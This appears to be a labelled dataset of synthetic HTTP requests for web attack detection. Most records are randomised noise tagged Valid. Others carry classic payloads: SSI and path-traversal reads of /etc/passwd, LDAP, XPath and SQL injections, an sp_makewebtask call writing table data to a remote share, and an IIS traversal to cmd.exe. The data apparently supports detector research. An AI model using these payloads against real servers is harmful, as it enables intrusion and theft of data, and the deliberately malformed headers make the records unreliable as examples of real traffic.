POST /2istznnclsecsaRhf5h/tqacenteense/era/xp41a/bpm/gniynaa6h.png? HTTP/1.1
Content-Length: 232
Content-Language: ehnohe
Content-Encoding: gzip
Content-MD5: b2FzZ2RhcmVDODRmZXNsdA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 10 Oct 09 10:32:14 CET
Host: 4.255.43.88
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: identity;q=0.9, compress;q=0.9, deflate, gzip, gzip;q=0.0
Accept-Language: xnn-boot;q=0.3, sIlnaprs-benvigl;q=0.3
Client-ip: 145.102.168.110
Cookie: ttullmimam=5X57XTqq;itrtcthm=14
Date: Sat, 02 Jul 05 24:14:20 GMT
Expect: chkksn
If-Unmodified-Since: Tue, 29 Mar 05 16:38:12 GMT
If-Match: "60iTwuKyZWjIevA"
If-None-Match: *
Pragma: d='eusaloe8'
Referer: http://www.ewaqe.it/5hse/tTeh.ace
TE: trailers,trailers
User-Agent: gi1r (nt-Qi4r5HI; ov3AEfByY; y9K8-ixFr; i-o4PBr; iYgpUDspgL)
Via: 1.4 147.201.129.5, 6.7 42.203.74.130, FTP/6.8 www.coGgsodh.htm
Transfer-Encoding: compress
----: -------------------------------------------------

asnn6yonw=<!--   #include     virtual="/etc/passwd"   -->&Et=wsiwMLsm2AVx&t5lN=cJ_Vh@Py9&8lae6snw=ntymA3nUlogaano&5rtci=shq~dH&fceut2=rsy3siwbintnair h&sknncnitwhktd=aenbiyTpneentNune&ipte7bnosz=s&Ntceieaaa=212

End - Id: 39574
Start - Id: 22569
class: Valid
GET /argtiuvnvHu/cdnXisHl7hijslsiQie/b_d2mOaFg0zhKY/cTac2DGBwV5e@FshM/aaassH/f9xpv7izvel1tDifeo/tk1XZB7bRIvhp/bVgKpK5/e.3_lV.gif?scey=eo&iQXnodedQV=ampinput&qX-J@=oS&duw9j6nFCSpB=85010&5Onk7ciisasfr=NisisitNri&tAs=202&Ll1l=745&i5eD0asdasrps=n0img&zEwwotfrecp=na%5Cl&cotT1teattgmhl=0%24s%3A&ok=uoisfmnmeitplk8%3C&FI4LTdelete=2&asSvoaw=701676 HTTP/1.1
Host: 154.108.184.204
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-2022-kr;q=0.7, cp-936, macintosh;q=0.5, shift_jis;q=0.2, iso-2022-kr
Accept-Encoding: identity, gzip;q=0.1, gzip;q=0.1, deflate, deflate
Accept-Language: fXvsdts7-el, jwePz-uf, re-legeenrX;q=0.7, d-wkyh, 1e-hcsclf;q=0.3
Cache-Control: max-stale
Client-ip: 14.142.132.191
Cookie: E4deqlthoofz=7nlfis;c8AncTlYcE=8509566;luTgyBbitqeui=ktdTdrop;eihnbT=cnnee eoesock_streamtdn;ezprnltyuli=405
Cookie2: $Version="51"
Date: Fri, 07 Oct 05 11:16:55 CET
ETag: W/"XAsOYXqELAWcTGvV"
Expect: sbtwss=YalrsR9d;tefcoaav
From: tetoseli@i9ihet.it
If-Modified-Since: Sun, 31 Oct 04 01:31:09 UTC
If-Unmodified-Since: Tue, 05 Feb 08 05:24:15 UTC
If-Match: *
If-None-Match: "lolgQ1UIh7UDyT6nI"
If-Range: Fri, 10 Oct 08 18:53:13 UTC
Max-Forwards: 2477
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM dGhkZkJhc241Z2RlRXF6YWl4bGFobGFzOGhhcnJPYXR4dG90aGllbmhzcGdz
Authorization: Basic c2lyaHdhY3A6YXZ1dE8=
Range: 008-622747,-490549,85-794080
Referer: /4reiAU.jpeg
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: npflgam (ehc16wM; g0Gg3y; p7e3Hs; m5riSSY)
UA-CPU: Sparc
UA-Disp: 5896,055,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 549x9098
Via: 1.0 www.snMfii0.htm:4
Transfer-Encoding: compress
Upgrade: sric/4.6, ineo7/5.6, uiont9/0.3, wEco3/6.9
Warning: 651 www.nfit.gif "ieetdewtnneo6h" 
X-Forwarded-For: 227.174.126.186
X-Serial-Number: 2569472
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22569
Start - Id: 38078
class: LdapInjection
GET /ceiea7/bv/ooosuy1ONsOxandnei/eo93G/aazky/pgtttgrehsookiNwhnr/C5to/n3RBwfCnZFG1bI8tnkb/oU9nT.CNC16vwGqjU4H/otODp/eTK8s@t5gySG6K8.shtml?nsdeinoe=480%29%28%26%28objectClass%3Dsrl%29%28%7C%28sn++%3D++en%29%28cn%3Deneh++++J*%29%29&Ue=u50oechnrustee2&2vLa4cF=dJpZEHyF&Wmocha3dwi=5oeoiU5d%5Dob&tttR=a%2Bspconnect&own3=eaini&c9.Pe@5=V0mAoau HTTP/1.0
Host: www.rnel1oo.net
Connection: close
Accept: text/xml
Accept-Charset: windows-1252, x-mac-icelandic, iso-8859-15;q=0.2
Accept-Encoding: *;q=0.3
Accept-Language: EHa-1dutxiO, i-Itri;q=0.8, iyjsHiah-d, ioisc-nhEuio
Cache-Control: max-stale=477
Client-ip: 114.76.49.126
Cookie: X-TUfd4MJv=libEsr;tums=hQvd9
Cookie2: $Version="542"
Date: Thu, 28 Jun 07 13:47:00 CET
ETag: W/"WR7kZYfXzDtqchhL"
Expect: 100-continue
From: zfmmsal@ymhqo.ch
If-Modified-Since: Wed, 15 Apr 09 16:14:24 CET
If-Unmodified-Since: Thu, 08 Jul 04 18:24:40 GMT
If-Match: *
If-None-Match: "ubuvWY1Vl3AJgZ8maMTo"
If-Range: "WGpGUBokgpmvAHOQVt"
Max-Forwards: 69
MIME-Version: 7.3
Pragma: n='llve'
Proxy-Authorization: Basic cm5pZXVqOmh0bXM=
Authorization: Basic dGpvZURvOnZmYXN1N20=
Range: 77-,76-
Referer: /Yebceh/euar/stnsaif/e9bfaeb.nsf
TE: gzip;q=0.7,chunked;q=0.4,chunked
Trailer: Pragma
User-Agent: a3lcrnag
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 3700x2595
Via: HTTP/3.4 93.235.5.1, FTP/1.7 98.235.59.17:416
Transfer-Encoding: sswea; nTSq=fynaeer
Upgrade: he4tl/7.5, euo/6.5, etH/9.6, aci/2.2, oojhe/4.2
Warning: 290 www.isci.css:805 "iIseaaalda5ig" "Wed, 15 Oct 08 18:13:14 GMT"
X-Forwarded-For: 67.89.141.76
X-Serial-Number: 814494240740
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38078
Start - Id: 48513
class: XPathInjection
PUT /vaWp2VGBQHy.bYsRN6./mtstNarog/fchGw-jL.@9DZINiin/6I1IlR/aonb2ieri96t/nOaeC0whHxFHUT1/fbjnjN.nsf? HTTP/1.1
Content-Length: 278
Content-Language: emasOu,tanm
Content-Encoding: deflate
Content-Location: /liaz/eriapma/1amchluj/hcofcT67.wmn
Content-MD5: ZjB0d3loV2Vwb2RudUVybg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 21 Sep 08 11:17:15 CET
Last-Modified: Sat, 27 Feb 10 05:37:09 GMT
Host: 245.88.163.86
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, deflate, deflate, compress, compress;q=0.0
Accept-Language: d3cu5nae-aDw32t;q=0.4, il-ksiza;q=0.9
Cache-Control: max-age=80452
Client-ip: 222.213.45.140
Cookie: ouds1=eee<;hocyitkhs=2085
Cookie2: $Version="2"
Date: Thu, 25 Jan 07 02:56:05 UTC
ETag: W/"Z8k6MID8rdOhM91kgfF"
Expect: pdaiytge=ttintxkT;rkEAm
From: ndy1yIc@htecd7n.uk
If-Modified-Since: Fri, 01 Jun 07 16:14:51 GMT
If-Unmodified-Since: Tue, 22 Feb 05 22:54:44 GMT
If-Match: *
If-None-Match: "nF.LSAMBYm1djvYQn5Z"
If-Range: Mon, 04 Sep 06 11:26:15 CET
Max-Forwards: 26
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="toiqs"
Authorization: dLedL1 9at7e=pu3pp5
Range: 811682-312,0-
Referer: /aucmewna/sjhet0/PEoam.php3
TE: trailers
Trailer: From
User-Agent: Mozilla/0.4 (compatible; MSIE 3.2; Win98; w68e8er; Neaga; leoTn)
UA-CPU: 68000
UA-OS: Solaris
UA-Pixels: 951x0046
Via: 2.0 www.thNIe4o.png, 8.8 www.esAetuh.js, 1.5 www.rse8e.jpg
Transfer-Encoding: deflate
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

2LlocationS8vvbscript1Xbs=eaidcf']  | P  | //user[   name/text(    )  =    'nb&bda8djLmtxa9l=owFoz8tE5o&ki5mmaibEshote7=iinecmI &boot.inir0agQNRU=497&tigri=6&drFtBeeo=hq1d&eexec3zSWhv=oCm-ar&asnuoeR=t 5]shobWae% i|uo&etezUIovfslic=dys1oslix&rt-fx=8

End - Id: 48513
Start - Id: 13032
class: Valid
GET /afIe/ewO.css?scriptg1wJPFGwFetc=nnhcYSN6&pi_iJwvar=ne&fjeaaqdMjCcycuh=3ANDm1gujL7k&U1uN-hG=3&Drb_vv=5sonl&wrr=nhoEfywmb&fE6V=aKT&y0CHPFl=6thttp&dg3angamen=bactuformtrssb6fnTpg&ynaiogn9ei=tGpXOc&muEahei=eoEteinb3d%7EilLlUn8&bco5r6ievlyda=880864428 HTTP/1.0
Host: 112.20.57.30
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.9
Accept-Language: pLswa7m-deyni2iE, tisZvesh-oxSst
Cache-Control: ssf=T0ge
Client-ip: 82.22.221.79
Cookie: 0ttelereExcfc3f=mhanW3o;anzss=p+ddIuh;lYCopen@217=730753;okNi0hg8nhke=w yi;8RunionFP9G7imgmail=oBFXUQ5f
Cookie2: $Version="7"
Date: Thu, 23 Jun 05 01:27:09 CET
ETag: W/"OKmEAzboWCMrzGY"
Expect: 100-continue
From: atLi@ntniAncgm.com
If-Modified-Since: Sun, 03 Oct 04 07:28:37 CET
If-Unmodified-Since: Mon, 03 Aug 09 11:52:35 UTC
If-Match: *
If-None-Match: *
If-Range: "rtj@rEH.I3PMKGnyI.gV"
Max-Forwards: 714
MIME-Version: 7.6
Pragma: p71ego0n=eio9
Proxy-Authorization: 3lgxt zSrsa=0e3eal
Authorization: Basic bmh6bTpoZWpmTmFt
Range: 809093-4768
Referer: /atLcO/begt/R5eLl/khwt0u/eieaitta.mpg
TE: trailers,trailers,chunked;q=0.8
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.5 (Windows; U; WinNT 2.0; td-Ad; rv:6.3.1) Gecko/92767400
UA-CPU: x86
UA-Disp: 5331,978,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 011x9947
Via: yloa7a/1.2 163.123.246.41
Transfer-Encoding: compress
Upgrade: ag4/9.4
Warning: 255 101.108.66.228 "edon2hsulniorc" "Sun, 25 Sep 05 11:05:11 CET"
X-Forwarded-For: 25.127.90.87
X-Serial-Number: 72290
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13032
Start - Id: 41873
class: SqlInjection
GET /eznjeen1/ZY4_ia/cp8Ax@fe/doaoltysemlNbi/uC@GkL/tP-SYym8nLxxCn.php3?Entniktastfz9ri=OR+831829748921%3D831829748921 HTTP/1.0
Host: www.6hab4e.cz
Connection: wortuy
Accept: text/*;q=0.6, image/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 151.178.225.162
Cookie: rsyoasinsmnaa4=b
Cookie2: $Version="40"
Date: Fri, 29 Sep 06 18:10:45 UTC
ETag: W/"NB8ujNmt0uyX._sVfglF"
Expect: estmtade=iia9d
From: uims2c@rtXh1sbi2a.cz
If-Modified-Since: Mon, 05 May 08 21:01:52 CET
If-Unmodified-Since: Tue, 19 Oct 04 05:20:34 GMT
If-Match: "zN46Y0TmmL92d7q1-fS"
If-None-Match: *
If-Range: Fri, 08 Jun 07 06:59:16 CET
Max-Forwards: 0
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: hruhs OR2omeK=eaefp
Authorization: Basic b2VlZ3c6bmFuSGF6
Range: 2764-93323,17883-91
Referer: /pheiI/yasu/eTeAcg/to2eKhe.jsp
TE: trailers,deflate;q=0.3,trailers
Trailer: Date
User-Agent: Mozilla/2.4 (Windows; U; WinNT 4.5; dp-pi; rv:8.7.2) Gecko/09997026
UA-CPU: PowerPC
UA-Disp: 9347,2639,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 698x973
Via: etroo/3.6 www.coao.css:6
Transfer-Encoding: sfmai
Upgrade: 4sh/4.2, Rdhtih/8.1
Warning: 392 113.130.15.37 "8vRtmnhtkaGbbhnilg" 
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 8017409
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41873
Start - Id: 36261
class: PathTransversal
POST /cgnAmoIfemlntdTos/kQdZ2W04WSM88..php3? HTTP/1.1
Content-Length: 203
Content-Language: oeln6qus
Content-Encoding: deflate
Content-Location: http://7esoaca.be/anea/HsO9/gsohit/mydeedt.tiff
Content-MD5: aGRuSWFTb2VraHB0Nm5pdA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Jul 09 13:45:12 UTC
Last-Modified: Wed, 10 Oct 07 06:44:48 GMT
Host: www.9htaoitiha.gov
Connection: lUctreio
Accept: video/mpeg, image/*;q=0.4
Accept-Charset: iso-8859-4;q=0.8, ks_c_5601-1987, x-mac-japanese
Accept-Encoding: 
Accept-Language: oaismp-dtio3n;q=0.4, E-eAunp, iIf-ofpvhoku;q=0.3, amlt-shRrBna;q=0.7
Cache-Control: no-store
Client-ip: 112.174.108.236
Cookie: rNopadbwagmeo2t=eIlM;9tginmnP=qK11jFCRb;1irss0ovoik=oeweeunthunOs;KtNQwEJOMRB=6
Cookie2: $Version="90"
Date: Thu, 15 Apr 10 24:29:36 GMT
ETag: "ZZOFOPkzczM28FH7WU"
Expect: 100-continue
From: tarcw@rtJihd7rad.st
If-Modified-Since: Fri, 18 Aug 06 23:17:20 UTC
If-Unmodified-Since: Tue, 21 Mar 06 13:19:29 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 08 May 08 19:56:09 UTC
Max-Forwards: 9
MIME-Version: 4.1
Pragma: at='lribde'
Authorization: NTLM ZU1ta28zbnVhaWVidXRzZWVNbmNubjVTZXhzYW9oaWFleGVuYU1vdEE=
Range: 52-067988,48957-
Referer: http://www.apgeaC.it/wrLSinfb/6roo/bklu3.zip
TE: gzip;q=0.6,trailers,deflate
Trailer: Via
User-Agent: Mozilla/7.6 (compatible; Konqueror/4.4; Solaris; eykn7nosn; na4hLaiul; hpCc)
UA-OS: Mac OS X
UA-Pixels: 274x803
Via: 6.4 233.244.8.64:6, 8.5 220.76.61.28, 7.0 0.132.69.0:14681
Transfer-Encoding: compress
Upgrade: ensibi/4.7, tetheo/8.4, iarhfi/9.3, lh4tm/2.6
Warning: 120 183.198.212.10 "5hoema" "Mon, 27 Nov 06 04:28:46 GMT"
X-Serial-Number: 708089043409657
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

hrrDnaecpgt6uer=/etc/passwd&haRisc3r1=rH8eeEhtmpeidiv>leye2e &xissoS=4896690344&opsTLCposition_VPT@g=wautoexecslwolmtstyleeetA0ah&adiocr9ezlu=sit&dD=a3m;&w8oO37fudpogEt=jcdNao&6drNae=npEXEjj9Sadp

End - Id: 36261
Start - Id: 35651
class: XPathInjection
GET /a4u/68Z5Sqi4LOXXcx/oOxisetiem5ei/iyi/0.QGvLoUpq8a6xv68xVy.css?A4anullv9=tnc6imt%40rasc&Loi=685&imNStUetemi6=s6eo&07Airlex=reecIarjoRd&dsfglf=499+or+1%3C+++++Bzpe%2Fofolwo%2FzuOS%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D4%5D++or+++++6%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&PstdinauniondHdnull=vu%27&MloAtebhpe6yo=55&1sphpGSstdin@=81894824 HTTP/1.1
Host: www.eeldcG90ti.fr
Connection: keep-alive
Accept: audio/basic;q=0.0, image/*
Accept-Charset: euc-cn;q=0.1, koi8;q=0.8, ks_c_5601-1987, iso-8859-4;q=0.9, x-mac-chinesesimp
Accept-Encoding: compress, compress, deflate, identity
Accept-Language: *
Cache-Control: min-fresh=5
Client-ip: 85.216.49.129
Cookie: 5EaSreZ1eeyls=ad;6iItebr=16641;ea8h69neOr=EnIiga?ibe;e0UUJ6b=m7tetgroup byp|:wtmp|tme e;uioGtaituHgsca=cEW_D
Cookie2: $Version="053"
Date: Sun, 14 Sep 08 24:16:17 GMT
ETag: W/"at_C70DiSTs.hfC"
Expect: ye2S
From: 8oiisi@uknxnhisdr.org
If-Modified-Since: Sat, 08 Sep 07 14:27:36 GMT
If-Unmodified-Since: Fri, 19 Mar 10 18:02:26 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 11 Feb 07 02:39:26 CET
Max-Forwards: 5
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: NTLM YzZrYmVzeXJjaU5uZXljczFGcHJjN2Vlcm80anJhaGlmdGU3d2dzaQ==
Range: -38,162-85,-031
Referer: http://aeuv.de/gwStuth/eYebeec/aeeseer/nehoS/nmhPa.asp
TE: gzip;q=0.3,chunked
Trailer: Range
User-Agent: 6o0je8n1xsa
UA-CPU: StrongARM
UA-Disp: 4216,933,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3327x2128
Via: FTP/5.6 177.200.131.82:261, 3.3 www.snttn.jpg, HTTP/4.9 248.15.226.204
Transfer-Encoding: ropcH; iTam3eua=koe0ro
Upgrade: zizt/1.0, Nfsr/7.3, araJv/5.9, 0athyr/9.5, 7a2ey/9.9
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 9747150150274
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35651
Start - Id: 206
class: Valid
GET /netreeAJYdooeuar/enroeibsE1/gLT/t@open6/mXUZyfZiycV/-@/0Lp-zn0Jq00@A3ga/s.Vd7MD1/hJXALwwAotBtWwMe/lDR3..mdb?oN=35yeFCGEL6A&WLzb0qQ7e4=saeaookulSke&9txteeiadbhh=849 HTTP/1.0
Host: 188.16.77.16
Connection: 6tir6e
Accept: image/jpeg, audio/*;q=0.5, audio/x-wav
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, identity, deflate, identity, compress;q=0.1
Accept-Language: ej0h6at1-5sr04r;q=0.4, orqaq-Le;q=0.7
Cache-Control: no-cache
Client-ip: 223.208.250.121
Cookie: Hsethon3nAdhc=gvr;i4e2rte9=4;4osfhoche=yli;ee;fetclt=773514;4ZFH-b4t0=3352835
Cookie2: $Version="60"
Date: Sat, 14 Jun 08 17:24:51 CET
ETag: W/"5OcIIHcnBRbkQ7Lfdxm"
Expect: ogare=doxf
From: wnun9d@Ilphteim0h.ch
If-Modified-Since: Thu, 04 Oct 07 03:53:16 CET
If-Unmodified-Since: Wed, 21 Jan 09 22:51:05 CET
If-Match: *
If-None-Match: *
If-Range: "7KLQIvJrpDsR5_0k"
Max-Forwards: 657
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: yghn ueizw2es=eeel
Authorization: Basic dkxzOXN1ODp5MFNlTA==
Range: 534828-
Referer: http://secee.uk/aomyhts/alnr/Soeoh/ttht/aNnin.dll
TE: chunked;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/7.5 (X11; U; Solaris 5.6; oi-te; rv:2.7.3) Gecko/99129538
UA-CPU: StrongARM
UA-Disp: 021,047,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 4314x599
Via: 2.1 206.140.193.104, 9.3 www.su21niei.png
Transfer-Encoding: gzip
Upgrade: Qte9/8.9, fuoe/5.0, efetmY/9.4, etlnke/8.4, nnb3rt/7.1
Warning: 087 www.ltOnotae.shtml:31935 "iiEllyneteg5u" "Thu, 28 May 09 07:54:06 GMT"
X-Forwarded-For: 209.28.165.11
X-Serial-Number: 3449007851195603
----: --------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 206
Start - Id: 29230
class: Valid
GET /at.AmNN.qDK4PiOz/a6@HhG/suboevtlnfeetG/iippI_2heYJhVlw9Amn/htaccesiexecp-t-WDuA_bodyK.html? HTTP/1.1
Host: www.aex8nnd11o.it
Connection: close
Accept: image/gif;q=0.3, application/rtf;q=0.0, audio/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=35037
Client-ip: 184.212.88.165
Cookie: ehtudDtl=select nA;anutPbh=rnpstiiO;td=qPmDs72Ph;ytor=3OAEvYH
Cookie2: $Version="37"
Date: Thu, 10 Apr 08 11:47:51 UTC
ETag: W/"0g6jIwNgmq@Y4ApsNc"
Expect: 100-continue
From: pfeb@exzls2nagt.biz
If-Modified-Since: Thu, 17 Dec 09 16:43:16 UTC
If-Unmodified-Since: Wed, 27 Feb 08 12:46:44 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 506
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest qop=deeie
Authorization: Basic bmR0dGFtdE86dG9vZW9vbmM=
Range: -2
Referer: http://www.uPas.ch/rxnzi7ia/3htcgwa/OswoM/1nnrahrz.txt
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/6.9 (Machintosh; U; PPC 2.8; nB-hE; rv:2.6.8) Gecko/76761012
UA-CPU: PowerPC
UA-Disp: 323,9503,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 200x896
Via: ttw/5.9 www.ewcMXa.shtml, 8.7 46.83.44.78
Transfer-Encoding: gzip
Upgrade: Tstenr/0.4, yi4rf/1.2
Warning: 361 218.11.136.34 "5tnre7tafvhoea" 
X-Forwarded-For: 232.31.166.192
X-Serial-Number: 417531274115
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29230
Start - Id: 41112
class: SqlInjection
GET /i5Pc6.S4cXMt8W1ziiaw/tjhReewiI9vokoejzn/7HG/bqAWstdinmd3TyBeaX3/Qand@s6-hxNSEWafh/o3xljbC.SN1_-FHKfw/noanTenheeeedde/trce4oomesn6RrHeqd/chloruwI5EohoiIeea/kumshtaedTcv8E0o8s/oH72AA.S2HEfU99B.htm?qeuTe=373328338&el5Tw5ebtr=ahhoylnarEeanmqdDS&eeeoas=gsnl%24x%7Eouvbscriptesiui%5D&y1e=5t6emsaWea1&gzrnt=ru4u84p%40Ee&aiframemE4MVRposition9f=e.LbAya2l2my&3he=%27%3B+++++EXEC+++++master..sp_makewebtask+++%22%5C%5C41.92.227.226%5Coy%5Ceklrca.tiff%22%2C+++%22SELECT++++*+++++FROM+++++INFORMATION_SCHEMA.TABLES%22&is0sAscsNe=nE&C_i3tmpuJZcItp=33693&9owipOye=likecatfJ&JxvHQ=hui%2BdiiaHifs&adatrme5wt2mo=rvoia&autoexecEIVDAYej=07595599 HTTP/1.1
Host: www.iUylAe.it
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean, x-mac-arabic, iso-8859-5;q=0.4
Accept-Encoding: *
Accept-Language: ao2zduz-usotwi;q=0.7, i8ientia-ioiknc;q=0.0
Cache-Control: max-age=2592
Client-ip: 190.211.91.23
Cookie: r0=l;s7allttgm=sCWWJ;umgdmsneyoacmh=348
Cookie2: $Version="75"
Date: Thu, 20 Jan 05 10:03:59 GMT
ETag: "o2wljYaHrxuGgPOQDnb6"
Expect: iCconail
From: ljbnc@t4tt.net
If-Modified-Since: Thu, 23 Oct 08 01:17:30 GMT
If-Unmodified-Since: Fri, 12 Mar 10 15:37:21 UTC
If-Match: "t_GjUQpiX4Mjpf_3Fi"
If-None-Match: *
If-Range: "Ggq11yjwKPT7am@PB"
Max-Forwards: 4127
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="sqsll"
Authorization: Digest realm
Range: -397
Referer: /dtacoaj/tarots0e/iaggmo9o/emuct.sh
TE: gzip
Trailer: Accept-Language
User-Agent: iCifrsa/4.0
UA-CPU: Sparc
UA-Disp: 071,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: FTP/6.7 www.nChhkume.jpg, 5.8 www.tdA5iaga.tiff
Transfer-Encoding: matoan; jymwutb=eigrn
Upgrade: mdt/1.4, asjofr/9.3, 9meo/3.8
Warning: 323 www.l1Er.tiff "djhflegmslO" "Thu, 15 Apr 04 02:45:31 UTC"
X-Forwarded-For: 120.66.15.37
X-Serial-Number: 54708069609443708
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41112
Start - Id: 24873
class: Valid
GET /t3gm3dRpx7xaCNntDf/uqyWdA8L3XsjRL3gEbT/KdPR9shutdownoaccess_logXI/irctaeaihs24nsee/j8e/ecotXanrnsboaej/yBbHAFhP/oBAwTbiK5c@2WBxKSQ/rnkaunensrbtcartycr/yUa_T0n.htm?xusistsden=e%40q6&in05wAmh=homeol&citixesidahh=n&aOetigedTtsazl=ruRr&CGG@5Z3guc=829&cef=6&wAD=Dv1nwNotS&miuctc63m=Ryh%3Cg&xnpfiIoiloysSNt=431198&iSteg=18&evkrn1=6444163&Tywei7dup=eF%3Etp&4cntr=219&Qmmstlois27aq=%3Cpnreg7en-s8esua+&w.ra4CZwinntiY=1icIkM HTTP/1.1
Host: www.r0eEml.st
Connection: teSmie
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, compress;q=0.0, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 203.244.89.76
Cookie: ow=3oaaktrtnt;Egs31qR=094995
Cookie2: $Version="9"
Date: Fri, 08 Feb 08 07:24:35 GMT
ETag: "qjOAITqA0zF7EvE"
Expect: 100-continue
From: Xn3Re@fshsaAh.de
If-Modified-Since: Fri, 30 Apr 04 11:41:09 UTC
If-Unmodified-Since: Thu, 01 Jan 09 18:29:53 UTC
If-Match: "EIE3aTrAfa272.S"
If-None-Match: "cKNsyFSGWwPXZEB.lM"
If-Range: Tue, 20 Jan 04 14:31:59 CET
Max-Forwards: 1
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Vigo a1lc=hriaibi
Authorization: Digest response="2fafe7b7dbDdb4E3598dEA5C4ea8eFD0"
Range: 2531-5,49-34
Referer: /H3Hxc/dihE8P/arbli2i/dbnyzof/iueYhans.msf
TE: trailers
Trailer: Accept-Language
User-Agent: e64dnJ http://www.s5ot.be
UA-CPU: MIPS
UA-Disp: 5769,5085,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 265x4380
Via: FTP/3.4 www.tdeh.gif
Transfer-Encoding: deflate
Upgrade: stHn3n/5.6, nuthh/9.0, irat7/4.8, wgloo/1.0
Warning: 569 www.oq8ot.css "draaicTya4hanxeos" 
X-Forwarded-For: 117.106.89.58
X-Serial-Number: 827466512
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24873
Start - Id: 44382
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.leiuciho.org
Connection: poi4t
Accept: */*
Accept-Charset: x-mac-roman;q=0.9, big5, iso-8859-7;q=0.6, x-mac-chinesesimp
Accept-Encoding: *;q=0.2
Accept-Language: ppO-aoeotc;q=0.5, tugpbr-8;q=0.9, fofolnT-6ie4Rhai
Cache-Control: o='tihhuId'
Client-ip: 90.164.80.82
Cookie: n1rilgdleu9enf=aa;EunionS.4bZkRg8=f unionOa6 pAstnen;dAtjo=t3NCJ.bp;rteimw=rar;lgTciliye=0335;botooedsr=a
Cookie2: $Version="962"
Date: Mon, 08 May 06 04:56:06 UTC
ETag: W/"e9iUBvPePkscvJ4"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Mon, 23 Jun 08 11:44:47 UTC
If-Unmodified-Since: Mon, 03 Nov 08 02:01:35 GMT
If-Match: "T4zlc4FMAAGr3y8"
If-None-Match: "dcNs23J-dHPSJRW9"
If-Range: Thu, 11 Oct 07 11:16:51 UTC
Max-Forwards: 5630
MIME-Version: 1.4
Pragma: eaeS26x=ia3iqche
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: Digest nc=E88c7DfF
Range: -592489
Referer: /xo7qN.zip
TE: trailers,chunked;q=0.5
Trailer: Proxy-Authorization
User-Agent: axlrXyDdR http://www.areeeu.biz
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8335x3340
Via: 2.5 149.98.207.116:1561, HTTP/6.9 150.154.217.84:04
Transfer-Encoding: deflate
Upgrade: nna/5.8, gcY9/4.6, dAdlar/8.6, yEaxn/7.9, t2eitT/5.5
Warning: 551 92.44.38.235:34239 "tifgnertsiaoesxw" 
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44382
Start - Id: 10353
class: Valid
